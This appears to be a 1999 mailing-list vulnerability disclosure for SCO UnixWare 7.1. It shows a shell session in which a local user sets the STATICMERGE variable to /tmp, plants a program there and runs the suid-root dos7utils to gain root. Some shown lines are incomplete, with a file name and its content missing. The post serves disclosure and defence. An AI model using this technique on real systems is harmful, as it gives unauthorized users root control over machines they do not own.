SCO UnixWare 7.1 local root exploit

From: Brock Tellier (btellierat_private)
Date: Tue Oct 05 1999 - 11:30:49 PDT

  • Next message: Glenn Walker: "Re: Weakness In "The Matrix" Screensaver For Windows"

    A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by
    default) which allows any user to execute any command as root.  The dos7utils
    program gets its exec path from the environment variable
    STATICMERGE.  By setting this to a directory writable by us and setting the -f
    switch, we can have dos7utils run our program as follows:
    bash-2.02$ uname -a; id; pwd
    UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
    uid=101(xnec) gid=1(other)
    bash-2.02$ export STATICMERGE=/tmp
    bash-2.02$ cat > /tmp/
    bash-2.02$ chmod 700 /tmp/ 
    bash-2.02$ ./dos7utils -f bah
    uid=0(root) gid=1(other)
    Searching through the securityfocus vulnerability archives yields 0 matches
    for search string "unixware", but several for "openserver".  I thought this
    was rather strange, considering that SCO is discontinuing OpenServer after
    5.0.5 in favor of the much more reliable (though not security-wise, evidently)
    UnixWare 7.  And so begins my audit of the virgin Unixware 7 so soon after my
    incomplete audit of SCO 5.0.5.
    Brock Tellier
    UNIX Systems Administrator
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